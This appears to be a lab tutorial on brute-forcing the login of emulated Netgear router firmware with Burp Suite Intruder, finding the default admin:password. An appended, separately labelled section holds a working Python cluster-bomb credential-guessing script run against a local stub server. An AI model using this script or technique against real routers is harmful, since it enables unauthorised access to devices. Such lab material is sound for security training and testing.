CRACKING AUTHENTICATION WITH BURP FOR NETGEAR ROUTER EMULATED FIRMWARE
- Layout for this exercise:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMhyvui2AtSnI7yrFF54sW2vCZkRdzs_IZH3tp4s79HAaeTv50go3l5-0zyHk3q_DARxl9tgm4wQZ1hADhF6pKbgY4upTWTEmZRsk39_R5HvFZJ_ouu80-1yStAtme3iCEOz-3d2ptxeVL/s400/layout.jpg)
- This exercise is based on a previous emulation of Netgear firmware:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWg9VP_a4s2Y-7rRYxMiUf0YI3a4ZIj-ruBEGJvqCnMyPZIr-_Qc4snr6KvWzINRWzSI_yj37CTrawexR0SP-FmVEWcmTMd3dXyht8pOVxT08-T-pA_JvcZ0YWoBnLoGfwylJhjAbcjsFU/s640/screenshot.3.jpg)
- Downloading the free edition of Burp Suite as a .JAR file:
https://portswigger.net/burp/freedownload
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhxa-CYkFt6Esh-ywXBXnQX4MsSFPSp4C_-UoXNwkLZ0wR9PpbSp0q4mdUuRASluEHBtPtt3dFLEG9MH_uoQ5rZj145SiwJ1BCdCmxJTW_z8X0jodjxvdwp0VpTlYa-j88RpzavcybwnAsW/s640/screenshot.4.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEga05KJEWCnp6MRNwLERKGaOExF9KTihZvRMOnlS_t-oriQN6eRIEBO7XPADckuK-GQjVVXMibOccIt-aGX6fFaPMjhz0o-U68oavsjgGzQ77BJhF7sLm43P7BQ1SRTSLGSiV9QxnqkZtVk/s1600/screenshot.7.jpg)
- The .JAR file is downloaded:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgZYa8LG9wkG9zNS0SorhSdR3LmMbYucwrTO1sDbXc-m7SvPNRWsmZfm9gea1FKgx8oAEqrj2NGR2QTEU_bED21ZGfOzqnSBf4lZM7iwKfXSyZ6B2GQ0NWNSn4kChl4Qw6zxBGfobbtw19n/s1600/screenshot.8.jpg)
- Launching the application:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9M-TosDHCvCZKvQE9Ec8iEbrvGGwpahLC0BWqVk0aeUQ2ZwrtD7RT7hk3kcLXgijRK4NUxlfzqKUTHaZ8BT8ab0Fkx1vdjHsod0LasDQdji4Wu2ns5lna9ydygjNFd5yYW4ip0nqa6M4y/s1600/screenshot.9.jpg)
- After accepting all the default options for Burp, let's ensure that the proxy listener is bound to localhost (127.0.0.1) on port 8080:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgG9cVgXJfWO1mNDwPiodHk81iIvNyxDU2zlEhxBV0XgTN02lgNMpdi9acejjPM-4_ihGNapcNzqt1QufJbsLytTX77V3Z5VnHjTHOz93Z8bhPJAHa8i8scXf3sBpZAKQyDbiNwEQJuLJTz/s1600/screenshot.11.jpg)
- Also, let's configure Burp so that interception applies to both client requests and server responses:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1Xkgt8ZTrhtcufCvWDtcDlY2-jyJGhoLJcgI1gOu4_aESwF_I1RbN3lAWLovC6zX_sQ62iAyyTUQtA2zwiPkAbzcIcUaITzqR8jj3cXijUSjXV7eGFQ5tFfkWWidlCuI-VYPhQ2Iwrjis/s1600/screenshot.12.jpg)
- Now it is time to point the Firefox browser at the Burp proxy:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhhkjWJV_cQIvLJNrVjRHK3-dZm7saP0EOJ-sy9fhEN1ZuH441oUI_oMTWz7jwxGuk2kGcVsNIWcKSkm4KBosNGqvjoLI-TOJ0PcKhOPhL5x20DCDV6O2dr3U2KUbaCYnx5b15zgG0ZI_cT/s1600/screenshot.1.jpg)
- Let's submit some fake credentials, for instance Username:Password:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvXGQldnYVv4moO4ewHLr3X5N-0o0g_JHNIFyBKjgDGNLU4lPV471YugGF0eQlID6LeBZk4YZD7DT1V5AtKkWK536Zf9pqzpwdWMzKg3bHs4sguLgLMYCxm2z9Spmo4x4S7qxVmxt2_c5a/s1600/screenshot.8.jpg)
- Burp intercepts and displays the fake credentials:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhjZ3S9k9D-_4J7Q23Qh_Th01aRCFQKQqbg_W3bCX6ZeJ-9WZK1MumcSGqsrqtbXLSEN2-WSb_4Ws2zISADDBVApepfARDK2L1T0TM6TDB_N3xY7myiGgketG91RT9xG-4CmV8sB4WJAl0i/s1600/screenshot.4.jpg)
- In the "HTTP history" tab, right-click the login request and choose the option "Send to Intruder":
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgT012pepCEwDp_U2UvwqMYaQhg4DG6CzdCOawkCRYEDomin1yLFayqIB5Z6R0Y_6lU0ALcWDpmGodB5hYYnzqR8CLZ1wp3-cet0XMzJDuWZ91bSrZurEXcgM9RQpWR7AUQvmkypV-NgK2h/s400/screenshot.19.jpg)
- The attack target is the one already known (the emulated firmware at 192.168.0.100, port 80):
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjsTN15XtCmBsEOP0lPgcdWlR-qUKXzU3irwr1qPlGkoOQ2MXkWsLOYg7Ma-96VuPWuseSyCxCAalUtLzkbOnrLxnFVVSMeNah2NVCh_SXWXDRivRLeuzgRMBwni4BrnTc76kpyyQlgBFoo/s1600/screenshot.20.jpg)
- The attack consists of using two payload lists, the first one for the username and the second one for the password, with Intruder's "Cluster bomb" attack type so that every username is tried against every password:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbXCvQJXXO4YcAjoUn7M5pelvdfpWXd7a8Mtt9oV9CGKBPhxgDcz4PzInRBtTjNPX_vvAcR721jN_j6DBfgid78PA1F1oZp0Gt0bMd1GfubRHfKUI3t0fARk1mJbkdHR_GIWSK8CvaWFUd/s1600/screenshot.6.jpg)
- Because this is a simple example, let's provide just 10 possible usernames and 10 possible passwords, for a total of 10x10 = 100 requests.
- For the username (list of 10):
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3RleK9XJJalQlhDXxOPaEZHVdV4y6SQGQu4il5CVktSI4ArsiQgJ7U_TOQb2ISGdUR7V7Gw8lf-2vbdm3mqCmhGO-7dTcKmHO64SC58pwywaCRdIAnmNmDGR-FZebI5nREiKe7QehZUae/s1600/screenshot.1.jpg)
- For the passwords (list of 10):
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgZM-5sRRd9xsRQfbQ2InGJ_kcQgRW1BNiwrNaEgwIdBuZ1Fh6viWxxbRGQ19WxedV4SxBOdZcMrTRoOcLfNLHYyYjsB6G3lebyVeI0nYCLqn_f5Rr157a1rD_tnVFCLrP2P2BAk1p_-9re/s1600/screenshot.2.jpg)
- As said before, in this simple case the total request count is 100 (10x10):
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNRXYGhzNlW5sFKMVUjriwb32qlvWPFB2sVq1ilWMIAVMXAT6ZNmWACskcAb6AMrTrpVi2FvU4tY9C7HqXMaNHhsEo__uajuKmvdmVg9GK_yCtu6qk_2z9t_axQ4HrFdxKcSQtH6S6CBKV/s400/screenshot.3.jpg)
- However, in a real scenario much larger wordlist text files could be loaded. The free edition throttles Intruder requests, so with large lists the attack becomes very slow; the Pro version of Burp Suite removes that limit. In any case, trying many more combinations takes proportionally longer, and a real device may also lock the account or rate-limit after repeated failures:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh518rRglPS0g16Evxo9Jh2MYmtIA-04fYbnYT_dv46zyTnYWOW0w-FMEZ41-qyYcwVtVKXrclnVJKFEkeuyOHOKcea1XJgoRgiEgpr0YaY4CBV870CiUiKi6uuDdecanS-jdpyzM0R_I3r/s1600/screenshot.24.jpg)
- Starting the attack:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjsoTfaenA0_1I83uz3Lxu-OxWrI-WliWf3ynrUMbsajXr0wANwyU3Xr1jep5t52B4XrUmqLCWS2mfTIrj5YKRb8LQgDZbUF-SzgY7qVIAMoCdpQNYy6wpKTZSVnKsJQAfHJbrPxTf5h-88/s400/screenshot.25.jpg)
- It is noticeable that the only trial (number 3) with a status 200 OK and a different response length (313) corresponds to admin:password, which are the default credentials for the Netgear device, meaning that the attack is successful. Sorting the Intruder results by status or length is the quickest way to spot such an outlier among the otherwise identical failed responses.
- Also, the 3rd trial yields a "loginok" response message:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-41S0V4B6ai9_uLMJvQPT_fxwtkrQNUwxvRNjM1YBvQP618E94i0KV7TXQMWOWbh-C6iLY4EYsrC01Pxe3oDu0AZvAcfk-zqRT8ZN7AiVwkHj2fCHpYn4gSrxZfnVVjsjwWh6tjFs_Hn4/s1600/screenshot.7.jpg)
- It is interesting to notice that this attack has been launched against an "emulated firmware", and not against an actual physical device, although the web server code handling the login is the one taken from the firmware image.
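The same attack, scripted, as an added example that is not part of the original post: it reproduces the Intruder cluster-bomb run above in Python against a local stand-in for the emulated firmware. The stand-in is a constructed HTTP Basic-auth server (the real emulation is not reachable here), and the wordlists, the "loginok" body and the valid pair admin:password are assumptions modelled on the screenshots. With "admin" first in the username list and "password" third in the password list, the hit is request number 3, as in the Intruder results table.

```python
"""Scripted cluster-bomb login brute force with outlier detection.

Added example, not code from the original post. Assumes the router UI uses
HTTP Basic authentication (a common choice on Netgear web interfaces); for a
form-based login only try_login() would change.
"""
import base64
import itertools
import threading
import urllib.error
import urllib.request
from collections import Counter
from http.server import BaseHTTPRequestHandler, HTTPServer

# Constructed wordlists (assumed, not the page's own): 10 usernames x 10 passwords.
USERNAMES = ["admin", "root", "user", "guest", "netgear",
             "support", "operator", "manager", "service", "test"]
PASSWORDS = ["admin", "1234", "password", "12345678", "netgear",
             "root", "letmein", "qwerty", "welcome", "changeme"]

# Assumed valid pair for the stand-in target (the Netgear default from the post).
VALID = ("admin", "password")

# Proxy-free opener so the script talks to the target directly.
OPENER = urllib.request.build_opener(urllib.request.ProxyHandler({}))


class RouterStub(BaseHTTPRequestHandler):
    """Constructed stand-in for the emulated firmware's login: 401 with a
    WWW-Authenticate challenge on failure, 200 with a short 'loginok' body
    on success. Both bodies are fixed so lengths are comparable."""

    def log_message(self, *args):  # silence per-request logging
        pass

    def do_GET(self):
        hdr = self.headers.get("Authorization", "")
        ok = False
        if hdr.startswith("Basic "):
            try:
                user, _, pw = base64.b64decode(hdr[6:]).decode().partition(":")
                ok = (user, pw) == VALID
            except (ValueError, UnicodeDecodeError):
                ok = False
        if ok:
            body = b"<html><body>loginok</body></html>"
            self.send_response(200)
        else:
            body = b"<html><body>401 Unauthorized</body></html>"
            self.send_response(401)
            self.send_header("WWW-Authenticate", 'Basic realm="NETGEAR"')
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)


def start_stub():
    """Start the stand-in server on a free localhost port in a daemon thread."""
    srv = HTTPServer(("127.0.0.1", 0), RouterStub)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


def cluster_bomb(users, passwords):
    """Every (user, password) pair, first list outermost, like Burp's
    'Cluster bomb' attack type: 10 x 10 = 100 requests."""
    return list(itertools.product(users, passwords))


def try_login(url, user, pw, timeout=5):
    """Send one Basic-auth attempt; return the (status, body length) signature."""
    token = base64.b64encode(f"{user}:{pw}".encode()).decode()
    req = urllib.request.Request(url, headers={"Authorization": f"Basic {token}"})
    try:
        with OPENER.open(req, timeout=timeout) as resp:
            return resp.status, len(resp.read())
    except urllib.error.HTTPError as e:  # 401 and other error codes land here
        return e.code, len(e.read())


def find_outliers(results):
    """results: list of ((user, pw), (status, length)). Flag responses whose
    signature differs from the most common one, which is how the single
    200/313 hit stood out among the failures in the Intruder results table."""
    counts = Counter(sig for _, sig in results)
    common_sig, _ = counts.most_common(1)[0]
    return [(cred, sig) for cred, sig in results if sig != common_sig]


def attack(url, users=USERNAMES, passwords=PASSWORDS):
    """Run the full cluster bomb against url and return the outlier credentials."""
    results = [((u, p), try_login(url, u, p)) for u, p in cluster_bomb(users, passwords)]
    return find_outliers(results)


if __name__ == "__main__":
    srv = start_stub()
    target = f"http://127.0.0.1:{srv.server_address[1]}/"
    for (user, pw), (status, length) in attack(target):
        print(f"hit: {user}:{pw} -> {status} ({length} bytes)")
    srv.shutdown()
```

Against the real emulation, point `attack()` at http://192.168.0.100/ instead of the stub and keep the outlier logic: a fixed-size failure page means any success shows up as a unique (status, length) pair, and if the target pads or randomises error pages the signature should be extended with a body marker such as "loginok".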